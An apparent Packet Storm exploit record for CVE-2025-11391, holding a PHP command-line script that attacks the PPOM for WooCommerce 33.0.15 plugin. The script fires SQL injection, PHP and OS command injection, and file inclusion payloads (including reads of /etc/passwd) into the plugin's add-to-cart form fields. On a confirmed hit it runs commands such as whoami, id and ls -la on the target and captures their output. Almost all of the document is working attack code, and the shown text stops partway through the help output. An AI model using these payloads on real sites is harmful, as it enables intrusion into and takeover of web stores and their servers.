{“lastseen”:”2026-02-16T17:45:10″,”description”:”This is an extensive exploit that leverages a remote SQL injection vulnerability in PPOM for WooCommerce version 33.0.15 to also achieve remote code execution and local file inclusion…”,”published”:”2026-02-16T00:00:00″,”modified”:”2026-02-16T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 PPOM for WooCommerce 33.0.15 SQL Injection \/ Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:215642″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-11391″],”sourceData”:”=============================================================================================================================================\\n | # Title : PPOM for WooCommerce 33.0.15 RCE |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/wordpress.org\/plugins\/woocommerce-product-addon\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/210742\/ \\u0026 \\tCVE-2025-11391\\n \\n [+] Summary : This script is an Advanced PHP CLI Security Testing Tool designed for authorized penetration testing. \\n It targets web applications to detect SQL Injection (SQLi) and Remote Code Execution (RCE) vulnerabilities using time-based, error-based, and behavior-based techniques.\\n \\n [+] PoC : php poc2.php –url 127.0.0.1 or php poc2.php -u 127.0.0.1 -t rce\\n \\n \\u003c?php\\n \\n \\n class SecurityTesterCLI {\\n private $target_url;\\n private $test_timeout;\\n private $verbose;\\n private $method;\\n private $output_file;\\n private $attack_type;\\n private $user_agent;\\n \\n public function __construct($url, $timeout = 7, $attack_type = ‘sql’, $verbose = false, $method = ‘auto’, $output_file = null) {\\n $this-\\u003etarget_url = $url;\\n $this-\\u003etest_timeout = $timeout;\\n $this-\\u003eattack_type = $attack_type;\\n $this-\\u003everbose = $verbose;\\n $this-\\u003emethod = $method;\\n $this-\\u003eoutput_file = $output_file;\\n $this-\\u003euser_agent = ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’;\\n }\\n \\n private function log($message, $type = ‘info’) {\\n $timestamp = date(‘Y-m-d H:i:s’);\\n $prefix = ”;\\n \\n switch ($type) {\\n case ‘success’:\\n $prefix = \\”[\u2713] \\”;\\n $color = \\”\\\\033[0;32m\\”;\\n break;\\n case ‘error’:\\n $prefix = \\”[\u2717] \\”;\\n $color = \\”\\\\033[0;31m\\”;\\n break;\\n case ‘warning’:\\n $prefix = \\”[!] \\”;\\n $color = \\”\\\\033[0;33m\\”;\\n break;\\n case ‘info’:\\n $prefix = \\”[*] \\”;\\n $color = \\”\\\\033[0;36m\\”;\\n break;\\n case ‘critical’:\\n $prefix = \\”[\u203c] \\”;\\n $color = \\”\\\\033[1;31m\\”;\\n break;\\n default:\\n $prefix = \\”[ ] \\”;\\n $color = \\”\\\\033[0m\\”;\\n }\\n \\n $formatted = \\”{$color}{$prefix}{$message}\\\\033[0m\\”;\\n echo $formatted . PHP_EOL;\\n \\n if ($this-\\u003eoutput_file) {\\n $plain = \\”[{$timestamp}] {$prefix}{$message}\\” . PHP_EOL;\\n file_put_contents($this-\\u003eoutput_file, $plain, FILE_APPEND);\\n }\\n \\n if ($this-\\u003everbose \\u0026\\u0026 $type == ‘info’) {\\n $debug_msg = \\”\\\\033[90m[DEBUG] {$timestamp}: {$message}\\\\033[0m\\” . PHP_EOL;\\n echo $debug_msg;\\n }\\n }\\n \\n \/\/ ==================== SQL Injection Payloads ====================\\n private function build_sql_payload($sleep_time = null) {\\n if ($sleep_time === null) {\\n $sleep_time = $this-\\u003etest_timeout;\\n }\\n \\n \/\/ \u0623\u0646\u0648\u0627\u0639 \u0645\u062e\u062a\u0644\u0641\u0629 \u0645\u0646 \u062d\u0645\u0648\u0644\u0627\u062a SQL Injection\\n $payloads = array(\\n ‘time_based’ =\\u003e array(\\n ‘name’ =\\u003e ‘Time-Based Blind SQLi’,\\n ‘payload’ =\\u003e \\”1 AND (SELECT 1 FROM (SELECT(SLEEP({$sleep_time})))A)\\”,\\n ‘field’ =\\u003e ‘ppom[fields][id]’\\n ),\\n ‘error_based’ =\\u003e array(\\n ‘name’ =\\u003e ‘Error-Based SQLi’,\\n ‘payload’ =\\u003e \\”1′ AND 1=CONVERT(int,(SELECT @@version))–\\”,\\n ‘field’ =\\u003e ‘ppom[fields][id]’\\n ),\\n ‘union_based’ =\\u003e array(\\n ‘name’ =\\u003e ‘Union-Based SQLi’,\\n ‘payload’ =\\u003e \\”1′ UNION SELECT NULL,@@version–\\”,\\n ‘field’ =\\u003e ‘ppom[fields][id]’\\n ),\\n ‘boolean_based’ =\\u003e array(\\n ‘name’ =\\u003e ‘Boolean-Based SQLi’,\\n ‘payload’ =\\u003e \\”1′ AND ‘1’=’1\\”,\\n ‘field’ =\\u003e ‘ppom[fields][id]’\\n )\\n );\\n \\n return $payloads;\\n }\\n \\n \/\/ ==================== RCE Payloads ====================\\n private function build_rce_payloads($test_type = ‘all’) {\\n \/\/ \u062d\u0645\u0648\u0644\u0627\u062a RCE \u0644\u0623\u0646\u0638\u0645\u0629 \u0645\u062e\u062a\u0644\u0641\u0629\\n $payloads = array(\\n ‘php’ =\\u003e array(\\n ‘name’ =\\u003e ‘PHP Command Injection’,\\n ‘payloads’ =\\u003e array(\\n ‘system’ =\\u003e ‘;system(\\\\’sleep ‘ . $this-\\u003etest_timeout . ‘\\\\’);’,\\n ‘shell_exec’ =\\u003e ‘;echo shell_exec(\\\\’sleep ‘ . $this-\\u003etest_timeout . ‘\\\\’);’,\\n ‘exec’ =\\u003e ‘;exec(\\\\’sleep ‘ . $this-\\u003etest_timeout . ‘\\\\’);’,\\n ‘backtick’ =\\u003e ‘;`sleep ‘ . $this-\\u003etest_timeout . ‘`;’,\\n ‘passthru’ =\\u003e ‘;passthru(\\\\’sleep ‘ . $this-\\u003etest_timeout . ‘\\\\’);’\\n ),\\n ‘fields’ =\\u003e array(‘ppom[fields][sql_injection]’, ‘ppom[ppom_option_price]’, ‘quantity’)\\n ),\\n ‘os_command’ =\\u003e array(\\n ‘name’ =\\u003e ‘OS Command Injection’,\\n ‘payloads’ =\\u003e array(\\n ‘unix_sleep’ =\\u003e ‘;sleep ‘ . $this-\\u003etest_timeout . ‘;’,\\n ‘unix_ping’ =\\u003e ‘;ping -c 3 127.0.0.1;’,\\n ‘windows_sleep’ =\\u003e ‘\\u0026 timeout \/T ‘ . $this-\\u003etest_timeout . ‘ \\u0026’,\\n ‘windows_ping’ =\\u003e ‘\\u0026 ping -n 3 127.0.0.1 \\u0026’,\\n ‘pipe_unix’ =\\u003e ‘|sleep ‘ . $this-\\u003etest_timeout . ‘|’,\\n ‘pipe_windows’ =\\u003e ‘|timeout \/T ‘ . $this-\\u003etest_timeout . ‘|’\\n ),\\n ‘fields’ =\\u003e array(‘ppom[fields][sql_injection]’, ‘ppom[ppom_option_price]’, ‘quantity’)\\n ),\\n ‘file_inclusion’ =\\u003e array(\\n ‘name’ =\\u003e ‘File Inclusion’,\\n ‘payloads’ =\\u003e array(\\n ‘php_wrapper’ =\\u003e ‘php:\/\/filter\/convert.base64-encode\/resource=\/etc\/passwd’,\\n ‘expect’ =\\u003e ‘expect:\/\/whoami’,\\n ‘data’ =\\u003e ‘data:\/\/text\/plain,\\u003c?php system(\\”sleep ‘ . $this-\\u003etest_timeout . ‘\\”);?\\u003e’,\\n ‘input’ =\\u003e ‘php:\/\/input’\\n ),\\n ‘fields’ =\\u003e array(‘ppom[fields][sql_injection]’, ‘ppom[ppom_option_price]’)\\n ),\\n ‘code_eval’ =\\u003e array(\\n ‘name’ =\\u003e ‘Code Evaluation’,\\n ‘payloads’ =\\u003e array(\\n ‘eval_php’ =\\u003e ‘\\u003c?php sleep(‘ . $this-\\u003etest_timeout . ‘);?\\u003e’,\\n ‘assert_php’ =\\u003e ‘\\u003c?php assert(\\”sleep(‘ . $this-\\u003etest_timeout . ‘)\\”);?\\u003e’,\\n ‘create_function’ =\\u003e ‘\\u003c?php $func=create_function(\\\\’\\\\’,\\\\’sleep(‘ . $this-\\u003etest_timeout . ‘);\\\\’);$func();?\\u003e’\\n ),\\n ‘fields’ =\\u003e array(‘ppom[fields][sql_injection]’)\\n )\\n );\\n \\n if ($test_type !== ‘all’ \\u0026\\u0026 isset($payloads[$test_type])) {\\n return array($test_type =\\u003e $payloads[$test_type]);\\n }\\n \\n return $payloads;\\n }\\n \\n \/\/ ==================== Test Execution ====================\\n private function send_request($post_data, $custom_url = null) {\\n $url = $custom_url ?: $this-\\u003etarget_url;\\n $start_time = microtime(true);\\n \\n if ($this-\\u003emethod === ‘curl’ || ($this-\\u003emethod === ‘auto’ \\u0026\\u0026 function_exists(‘curl_version’))) {\\n return $this-\\u003esend_curl_request($url, $post_data, $start_time);\\n } else {\\n return $this-\\u003esend_file_request($url, $post_data, $start_time);\\n }\\n }\\n \\n private function send_curl_request($url, $post_data, $start_time) {\\n $ch = curl_init();\\n \\n curl_setopt_array($ch, array(\\n CURLOPT_URL =\\u003e $url,\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_POST =\\u003e true,\\n CURLOPT_POSTFIELDS =\\u003e http_build_query($post_data),\\n CURLOPT_TIMEOUT =\\u003e $this-\\u003etest_timeout + 5,\\n CURLOPT_CONNECTTIMEOUT =\\u003e 5,\\n CURLOPT_HEADER =\\u003e true,\\n CURLOPT_USERAGENT =\\u003e $this-\\u003euser_agent,\\n CURLOPT_FOLLOWLOCATION =\\u003e true,\\n CURLOPT_MAXREDIRS =\\u003e 3,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_SSL_VERIFYHOST =\\u003e false\\n ));\\n \\n $response = curl_exec($ch);\\n $error = curl_error($ch);\\n $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n $total_time = curl_getinfo($ch, CURLINFO_TOTAL_TIME);\\n \\n curl_close($ch);\\n \\n $end_time = microtime(true);\\n $duration = $end_time – $start_time;\\n \\n return array(\\n ‘duration’ =\\u003e $duration,\\n ‘error’ =\\u003e $error,\\n ‘http_code’ =\\u003e $http_code,\\n ‘response’ =\\u003e $response,\\n ‘method’ =\\u003e ‘cURL’\\n );\\n }\\n \\n private function send_file_request($url, $post_data, $start_time) {\\n if (!ini_get(‘allow_url_fopen’)) {\\n throw new Exception(‘allow_url_fopen is disabled’);\\n }\\n \\n $options = array(\\n ‘http’ =\\u003e array(\\n ‘header’ =\\u003e \\”Content-type: application\/x-www-form-urlencoded\\\\r\\\\nUser-Agent: {$this-\\u003euser_agent}\\”,\\n ‘method’ =\\u003e ‘POST’,\\n ‘content’ =\\u003e http_build_query($post_data),\\n ‘timeout’ =\\u003e $this-\\u003etest_timeout + 5,\\n ‘ignore_errors’ =\\u003e true\\n ),\\n ‘ssl’ =\\u003e array(\\n ‘verify_peer’ =\\u003e false,\\n ‘verify_peer_name’ =\\u003e false\\n )\\n );\\n \\n $context = stream_context_create($options);\\n \\n try {\\n $response = @file_get_contents($url, false, $context);\\n \\n if ($response === false) {\\n $error = error_get_last();\\n $error_message = isset($error[‘message’]) ? $error[‘message’] : ‘Unknown error’;\\n throw new Exception($error_message);\\n }\\n \\n $end_time = microtime(true);\\n $duration = $end_time – $start_time;\\n \\n return array(\\n ‘duration’ =\\u003e $duration,\\n ‘error’ =\\u003e null,\\n ‘http_code’ =\\u003e 200, \/\/ \u0627\u0641\u062a\u0631\u0627\u0636\u064a\\n ‘response’ =\\u003e $response,\\n ‘method’ =\\u003e ‘file_get_contents’\\n );\\n \\n } catch (Exception $e) {\\n $end_time = microtime(true);\\n $duration = $end_time – $start_time;\\n \\n return array(\\n ‘duration’ =\\u003e $duration,\\n ‘error’ =\\u003e $e-\\u003egetMessage(),\\n ‘http_code’ =\\u003e 0,\\n ‘response’ =\\u003e null,\\n ‘method’ =\\u003e ‘file_get_contents’\\n );\\n }\\n }\\n \\n \/\/ ==================== SQL Injection Tests ====================\\n public function test_sql_injection() {\\n $this-\\u003elog(\\”Starting SQL Injection Tests\\”, ‘info’);\\n $this-\\u003elog(\\”Testing Time-Based Blind SQLi with SLEEP({$this-\\u003etest_timeout})\\”, ‘info’);\\n \\n $payloads = $this-\\u003ebuild_sql_payload();\\n $results = array();\\n \\n foreach ($payloads as $type =\\u003e $payload_info) {\\n $this-\\u003elog(\\”Testing: {$payload_info[‘name’]}\\”, ‘info’);\\n \\n $post_data = array(\\n ‘add-to-cart’ =\\u003e ’72’,\\n ‘quantity’ =\\u003e ‘1’,\\n ‘ppom[fields][sql_injection]’ =\\u003e ‘test_value’,\\n $payload_info[‘field’] =\\u003e $payload_info[‘payload’],\\n ‘ppom[ppom_option_price]’ =\\u003e ‘\\”\\”‘\\n );\\n \\n $result = $this-\\u003esend_request($post_data);\\n $analysis = $this-\\u003eanalyze_sql_result($result, $payload_info[‘name’]);\\n \\n $results[$type] = array(\\n ‘name’ =\\u003e $payload_info[‘name’],\\n ‘vulnerable’ =\\u003e $analysis[‘vulnerable’],\\n ‘duration’ =\\u003e $result[‘duration’],\\n ‘details’ =\\u003e $analysis[‘details’]\\n );\\n \\n if ($analysis[‘vulnerable’]) {\\n $this-\\u003elog(\\”VULNERABLE to {$payload_info[‘name’]}!\\”, ‘success’);\\n \/\/ \u062a\u0648\u0642\u0641 \u0639\u0646 \u0627\u0644\u0627\u062e\u062a\u0628\u0627\u0631\u0627\u062a \u0627\u0644\u0623\u062e\u0631\u0649 \u0625\u0630\u0627 \u0648\u062c\u062f\u0646\u0627 \u062b\u063a\u0631\u0629\\n if ($type === ‘time_based’ \\u0026\\u0026 $analysis[‘vulnerable’]) {\\n break;\\n }\\n } else {\\n $this-\\u003elog(\\”Not vulnerable to {$payload_info[‘name’]}\\”, ‘info’);\\n }\\n \\n \/\/ \u0627\u0646\u062a\u0638\u0627\u0631 \u0628\u064a\u0646 \u0627\u0644\u0637\u0644\u0628\u0627\u062a \u0644\u062a\u062c\u0646\u0628 \u0627\u0644\u062a\u062d\u0645\u064a\u0644 \u0627\u0644\u0632\u0627\u0626\u062f\\n sleep(1);\\n }\\n \\n return $results;\\n }\\n \\n private function analyze_sql_result($result, $test_name) {\\n $duration = $result[‘duration’];\\n $error = $result[‘error’];\\n \\n \/\/ \u0644\u0644\u0640 Time-Based SQLi\\n if (strpos($test_name, ‘Time-Based’) !== false) {\\n if ($error \\u0026\\u0026 preg_match(‘\/timed\\\\s*out\/i’, $error)) {\\n if ($duration \\u003e= $this-\\u003etest_timeout – 0.5) {\\n return array(\\n ‘vulnerable’ =\\u003e true,\\n ‘details’ =\\u003e \\”Timeout after {$duration}s confirms vulnerability\\”\\n );\\n }\\n } elseif ($duration \\u003e= $this-\\u003etest_timeout – 0.5) {\\n return array(\\n ‘vulnerable’ =\\u003e true,\\n ‘details’ =\\u003e \\”Delayed response ({$duration}s) indicates vulnerability\\”\\n );\\n }\\n }\\n \\n \/\/ \u0644\u0644\u0640 Error-Based SQLi\\n if (strpos($test_name, ‘Error-Based’) !== false) {\\n if ($result[‘response’] \\u0026\\u0026 (\\n preg_match(‘\/SQL syntax\/i’, $result[‘response’]) ||\\n preg_match(‘\/mysql\/i’, $result[‘response’]) ||\\n preg_match(‘\/error\/i’, $result[‘response’])\\n )) {\\n return array(\\n ‘vulnerable’ =\\u003e true,\\n ‘details’ =\\u003e \\”SQL error found in response\\”\\n );\\n }\\n }\\n \\n return array(\\n ‘vulnerable’ =\\u003e false,\\n ‘details’ =\\u003e \\”No signs of vulnerability detected\\”\\n );\\n }\\n \\n \/\/ ==================== RCE Tests ====================\\n public function test_rce($rce_type = ‘all’) {\\n $this-\\u003elog(\\”Starting RCE (Remote Code Execution) Tests\\”, ‘info’);\\n $this-\\u003elog(\\”Testing command execution with delay of {$this-\\u003etest_timeout} seconds\\”, ‘info’);\\n \\n $payloads = $this-\\u003ebuild_rce_payloads($rce_type);\\n $results = array();\\n $vulnerable_found = false;\\n \\n foreach ($payloads as $category =\\u003e $category_info) {\\n $this-\\u003elog(\\”Testing category: {$category_info[‘name’]}\\”, ‘info’);\\n \\n foreach ($category_info[‘payloads’] as $payload_name =\\u003e $payload) {\\n $this-\\u003elog(\\” Testing payload: {$payload_name}\\”, ‘info’);\\n \\n \/\/ \u062a\u062c\u0631\u0628\u0629 \u0627\u0644\u062d\u0645\u0648\u0644\u0629 \u0641\u064a \u0643\u0644 \u062d\u0642\u0644 \u0645\u0645\u0643\u0646\\n foreach ($category_info[‘fields’] as $field) {\\n $post_data = array(\\n ‘add-to-cart’ =\\u003e ’72’,\\n ‘quantity’ =\\u003e ‘1’,\\n ‘ppom[fields][sql_injection]’ =\\u003e ‘test_value’,\\n $field =\\u003e $payload,\\n ‘ppom[ppom_option_price]’ =\\u003e ‘\\”\\”‘\\n );\\n \\n $this-\\u003elog(\\” Field: {$field}\\”, ‘info’);\\n $result = $this-\\u003esend_request($post_data);\\n $analysis = $this-\\u003eanalyze_rce_result($result, $payload_name, $field);\\n \\n $result_key = \\”{$category}_{$payload_name}_{$field}\\”;\\n $results[$result_key] = array(\\n ‘category’ =\\u003e $category_info[‘name’],\\n ‘payload’ =\\u003e $payload_name,\\n ‘field’ =\\u003e $field,\\n ‘vulnerable’ =\\u003e $analysis[‘vulnerable’],\\n ‘duration’ =\\u003e $result[‘duration’],\\n ‘details’ =\\u003e $analysis[‘details’]\\n );\\n \\n if ($analysis[‘vulnerable’]) {\\n $this-\\u003elog(\\” VULNERABLE! {$category_info[‘name’]} via {$field}\\”, ‘success’);\\n $vulnerable_found = true;\\n \\n \/\/ \u0645\u062d\u0627\u0648\u0644\u0629 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0625\u0636\u0627\u0641\u064a \u0625\u0630\u0627 \u0643\u0627\u0646\u062a \u062b\u063a\u0631\u0629 RCE\\n if ($analysis[‘vulnerable’]) {\\n $this-\\u003eattempt_rce_exploitation($field, $category);\\n }\\n \\n break 2; \/\/ \u062e\u0631\u0648\u062c \u0645\u0646 \u0627\u0644\u062d\u0644\u0642\u062a\u064a\u0646 \u0627\u0644\u062f\u0627\u062e\u0644\u064a\u062a\u064a\u0646\\n } else {\\n $this-\\u003elog(\\” Not vulnerable\\”, ‘info’);\\n }\\n \\n \/\/ \u0627\u0646\u062a\u0638\u0627\u0631 \u0642\u0635\u064a\u0631 \u0628\u064a\u0646 \u0627\u0644\u0645\u062d\u0627\u0648\u0644\u0627\u062a\\n usleep(500000); \/\/ 0.5 \u062b\u0627\u0646\u064a\u0629\\n }\\n }\\n \\n if ($vulnerable_found) {\\n break;\\n }\\n }\\n \\n return $results;\\n }\\n \\n private function analyze_rce_result($result, $payload_name, $field) {\\n $duration = $result[‘duration’];\\n $error = $result[‘error’];\\n $response = $result[‘response’];\\n \\n \/\/ \u0627\u0644\u0643\u0634\u0641 \u0628\u0646\u0627\u0621\u064b \u0639\u0644\u0649 \u0648\u0642\u062a \u0627\u0644\u0627\u0633\u062a\u062c\u0627\u0628\u0629\\n if (strpos($payload_name, ‘sleep’) !== false || \\n strpos($payload_name, ‘timeout’) !== false ||\\n strpos($payload_name, ‘ping’) !== false) {\\n \\n if ($error \\u0026\\u0026 preg_match(‘\/timed\\\\s*out\/i’, $error)) {\\n if ($duration \\u003e= $this-\\u003etest_timeout – 0.5) {\\n return array(\\n ‘vulnerable’ =\\u003e true,\\n ‘details’ =\\u003e \\”Command execution confirmed by timeout\\”\\n );\\n }\\n } elseif ($duration \\u003e= $this-\\u003etest_timeout – 0.5) {\\n return array(\\n ‘vulnerable’ =\\u003e true,\\n ‘details’ =\\u003e \\”Command execution confirmed by delayed response\\”\\n );\\n }\\n }\\n \\n \/\/ \u0627\u0644\u0643\u0634\u0641 \u0628\u0646\u0627\u0621\u064b \u0639\u0644\u0649 \u0645\u062d\u062a\u0648\u0649 \u0627\u0644\u0627\u0633\u062a\u062c\u0627\u0628\u0629\\n if ($response) {\\n \/\/ \u0627\u0644\u0628\u062d\u062b \u0639\u0646 \u0645\u062e\u0631\u062c\u0627\u062a \u0627\u0644\u0623\u0648\u0627\u0645\u0631\\n if (preg_match(‘\/127\\\\.0\\\\.0\\\\.1\/’, $response) \\u0026\\u0026 \\n (strpos($payload_name, ‘ping’) !== false)) {\\n return array(\\n ‘vulnerable’ =\\u003e true,\\n ‘details’ =\\u003e \\”Ping command output found in response\\”\\n );\\n }\\n \\n \/\/ \u0627\u0644\u0628\u062d\u062b \u0639\u0646 \u0623\u062e\u0637\u0627\u0621 PHP \u0623\u0648 \u062a\u0646\u0641\u064a\u0630\\n if (preg_match(‘\/Warning:|Notice:|Fatal error:|system\\\\(|shell_exec\\\\(\/i’, $response)) {\\n return array(\\n ‘vulnerable’ =\\u003e true,\\n ‘details’ =\\u003e \\”PHP execution evidence found\\”\\n );\\n }\\n }\\n \\n return array(\\n ‘vulnerable’ =\\u003e false,\\n ‘details’ =\\u003e \\”No evidence of command execution\\”\\n );\\n }\\n \\n private function attempt_rce_exploitation($field, $category) {\\n $this-\\u003elog(\\”Attempting further exploitation…\\”, ‘warning’);\\n \\n $test_commands = array(\\n ‘whoami’ =\\u003e ‘whoami’,\\n ‘id’ =\\u003e ‘id’,\\n ‘pwd’ =\\u003e ‘pwd’,\\n ‘ls’ =\\u003e ‘ls -la’,\\n ‘dir’ =\\u003e ‘dir’,\\n ‘phpinfo’ =\\u003e ‘phpinfo()’,\\n ‘uname’ =\\u003e ‘uname -a’\\n );\\n \\n foreach ($test_commands as $cmd_name =\\u003e $command) {\\n $payload = ”;\\n \\n if ($category === ‘php’) {\\n $payload = ‘;echo \\”\\\\n[CMD: ‘ . $cmd_name . ‘]\\\\n\\”;’;\\n $payload .= ‘system(\\”‘ . addslashes($command) . ‘\\”);’;\\n $payload .= ‘echo \\”\\\\n\\”;’;\\n } else {\\n $payload = ‘;echo \\”\\\\n[CMD: ‘ . $cmd_name . ‘]\\\\n\\”;’;\\n $payload .= $command . ‘;’;\\n $payload .= ‘echo \\”\\\\n\\”;’;\\n }\\n \\n $post_data = array(\\n ‘add-to-cart’ =\\u003e ’72’,\\n ‘quantity’ =\\u003e ‘1’,\\n ‘ppom[fields][sql_injection]’ =\\u003e ‘test_value’,\\n $field =\\u003e $payload,\\n ‘ppom[ppom_option_price]’ =\\u003e ‘\\”\\”‘\\n );\\n \\n $result = $this-\\u003esend_request($post_data);\\n \\n if ($result[‘response’]) {\\n \/\/ \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u0645\u062e\u0631\u062c\u0627\u062a \u0627\u0644\u0623\u0645\u0631\\n $pattern = ‘\/\\\\[CMD: ‘ . preg_quote($cmd_name, ‘\/’) . ‘\\\\]\\\\s*(.*?)(?=\\\\n\\\\[CMD:|$)\/s’;\\n if (preg_match($pattern, $result[‘response’], $matches)) {\\n $output = trim($matches[1]);\\n if (!empty($output)) {\\n $this-\\u003elog(\\”Command ‘{$cmd_name}’ output: {$output}\\”, ‘critical’);\\n }\\n }\\n }\\n \\n usleep(300000); \/\/ 0.3 \u062b\u0627\u0646\u064a\u0629 \u0628\u064a\u0646 \u0627\u0644\u0623\u0648\u0627\u0645\u0631\\n }\\n }\\n \\n \/\/ ==================== Main Test Runner ====================\\n public function run_complete_test() {\\n $this-\\u003eshow_banner();\\n \\n $this-\\u003elog(\\”Starting Comprehensive Security Test\\”, ‘info’);\\n $this-\\u003elog(\\”Target: {$this-\\u003etarget_url}\\”, ‘info’);\\n $this-\\u003elog(\\”Attack Type: \\” . strtoupper($this-\\u003eattack_type), ‘info’);\\n $this-\\u003elog(\\”Timeout: {$this-\\u003etest_timeout} seconds\\”, ‘info’);\\n $this-\\u003elog(\\”Timestamp: \\” . date(‘Y-m-d H:i:s’), ‘info’);\\n $this-\\u003elog(\\”\\”, ‘info’);\\n \\n $all_results = array();\\n \\n \/\/ \u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u0627\u062e\u062a\u0628\u0627\u0631\u0627\u062a \u0627\u0644\u0645\u0637\u0644\u0648\u0628\u0629\\n if ($this-\\u003eattack_type === ‘sql’ || $this-\\u003eattack_type === ‘all’) {\\n $all_results[‘sql_injection’] = $this-\\u003etest_sql_injection();\\n }\\n \\n if ($this-\\u003eattack_type === ‘rce’ || $this-\\u003eattack_type === ‘all’) {\\n $all_results[‘rce’] = $this-\\u003etest_rce(‘all’);\\n }\\n \\n $this-\\u003eshow_detailed_summary($all_results);\\n \\n return $all_results;\\n }\\n \\n private function show_banner() {\\n echo \\”\\\\033[1;35m\\” . str_repeat(\\”=\\”, 60) . \\”\\\\033[0m\\” . PHP_EOL;\\n echo \\”\\\\033[1;35m\\” . \\” ADVANCED SECURITY TESTER TOOL \\” . \\”\\\\033[0m\\” . PHP_EOL;\\n echo \\”\\\\033[1;35m\\” . \\” SQLi + RCE Vulnerability Scanner \\” . \\”\\\\033[0m\\” . PHP_EOL;\\n echo \\”\\\\033[1;35m\\” . str_repeat(\\”=\\”, 60) . \\”\\\\033[0m\\” . PHP_EOL . PHP_EOL;\\n }\\n \\n private function show_detailed_summary($results) {\\n echo PHP_EOL;\\n echo \\”\\\\033[1;34m\\” . str_repeat(\\”=\\”, 60) . \\”\\\\033[0m\\” . PHP_EOL;\\n echo \\”\\\\033[1;34m\\” . \\” DETAILED TEST SUMMARY \\” . \\”\\\\033[0m\\” . PHP_EOL;\\n echo \\”\\\\033[1;34m\\” . str_repeat(\\”=\\”, 60) . \\”\\\\033[0m\\” . PHP_EOL;\\n \\n $total_vulnerabilities = 0;\\n \\n foreach ($results as $test_type =\\u003e $test_results) {\\n echo PHP_EOL . \\”\\\\033[1;36m\\” . strtoupper(str_replace(‘_’, ‘ ‘, $test_type)) . \\” RESULTS:\\\\033[0m\\” . PHP_EOL;\\n \\n $type_vulnerabilities = 0;\\n foreach ($test_results as $key =\\u003e $result) {\\n $status = $result[‘vulnerable’] ? \\n \\”\\\\033[1;31mVULNERABLE\\\\033[0m\\” : \\n \\”\\\\033[1;32mSAFE\\\\033[0m\\”;\\n \\n $name = isset($result[‘name’]) ? $result[‘name’] : (isset($result[‘category’]) ? $result[‘category’] : ‘Unknown’);\\n echo \\” \u2022 {$name}: {$status}\\”;\\n \\n if ($result[‘vulnerable’]) {\\n echo \\” ({$result[‘details’]})\\”;\\n $type_vulnerabilities++;\\n $total_vulnerabilities++;\\n }\\n \\n if (isset($result[‘duration’])) {\\n echo \\” [Time: \\” . number_format($result[‘duration’], 2) . \\”s]\\”;\\n }\\n \\n echo PHP_EOL;\\n }\\n \\n if ($type_vulnerabilities \\u003e 0) {\\n echo \\” \\\\033[1;33mFound {$type_vulnerabilities} vulnerabilities!\\\\033[0m\\” . PHP_EOL;\\n }\\n }\\n \\n echo PHP_EOL;\\n echo \\”\\\\033[1;34m\\” . str_repeat(\\”-\\”, 60) . \\”\\\\033[0m\\” . PHP_EOL;\\n \\n if ($total_vulnerabilities \\u003e 0) {\\n echo \\”\\\\033[1;31m\\” . \\”\u203c CRITICAL: {$total_vulnerabilities} VULNERABILITIES FOUND!\\” . \\”\\\\033[0m\\” . PHP_EOL;\\n echo \\”\\\\033[1;33m\\” . \\” Immediate remediation required!\\” . \\”\\\\033[0m\\” . PHP_EOL;\\n echo \\”\\\\033[1;33m\\” . \\” Recommendations:\\” . \\”\\\\033[0m\\” . PHP_EOL;\\n echo \\”\\\\033[1;33m\\” . \\” 1. Update all software components\\” . \\”\\\\033[0m\\” . PHP_EOL;\\n echo \\”\\\\033[1;33m\\” . \\” 2. Implement input validation\/sanitization\\” . \\”\\\\033[0m\\” . PHP_EOL;\\n echo \\”\\\\033[1;33m\\” . \\” 3. Use prepared statements for SQL\\” . \\”\\\\033[0m\\” . PHP_EOL;\\n echo \\”\\\\033[1;33m\\” . \\” 4. Disable dangerous PHP functions\\” . \\”\\\\033[0m\\” . PHP_EOL;\\n } else {\\n echo \\”\\\\033[1;32m\\” . \\”\u2713 No vulnerabilities detected in this scan\\” . \\”\\\\033[0m\\” . PHP_EOL;\\n echo \\”\\\\033[1;36m\\” . \\” Note: This doesn’t guarantee complete security\\” . \\”\\\\033[0m\\” . PHP_EOL;\\n }\\n \\n echo PHP_EOL;\\n echo \\”\\\\033[1;36m\\” . \\”Scan completed at: \\” . date(‘Y-m-d H:i:s’) . \\”\\\\033[0m\\” . PHP_EOL;\\n }\\n }\\n \\n \/\/ ==================== CLI Interface ====================\\n function show_help() {\\n echo \\”\\\\033[1;33m\\” . \\”Advanced Security Tester – Usage Guide\\” . \\”\\\\033[0m\\” . PHP_EOL;\\n echo \\”\\\\033[1;33m\\” . str_repeat(\\”=\\”, 50) . \\”\\\\033[0m\\” . PHP_EOL . PHP_EOL;\\n \\n echo \\”\\\\033[1;32m\\” . \\”Required:\\” . \\”\\\\033[0m\\” . PHP_EOL;\\n echo \\” –url, -u Target URL\\” . PHP_EOL . PHP_EOL;\\n \\n echo \\”\\\\033[1;32m\\” . \\”Attack Types:\\” . \\”\\\\033[0m\\” . PHP_EOL;\\n echo \\” –type, -t Test type: sql, rce, all (default: all)\\” . PHP_EOL . PHP_EOL;\\n \\n echo \\”\\\\033[1;32m\\” . \\”Options:\\” . \\”\\\\033[0m\\” . PHP_EOL;\\n echo \\” –timeout, -s Sleep\/delay time in seconds (default: 7)\\” . PHP_EOL;\\n echo \\” –method, -m Request method: curl, file, auto (default: auto)\\” . PHP_EOL;\\n echo \\” –verbose, -v Enable verbose output\\” . PHP_EOL;\\n echo \\” –output, -o Save results to file\\” . PHP_EOL;\\n echo \\” –help, -h Show this help\\” . PHP_EOL . PHP_EOL;\\n \\n echo \\”\\\\033[1;32m\\” . \\”Examples:\\” . \\”\\\\033[0m\\” . PHP_EOL;\\n echo \\” php security_tester.php -u http:\/\/target.com\/\\” . PHP_EOL;\\n echo \\” php security_tester.php -u http:\/\/target.com -t sql 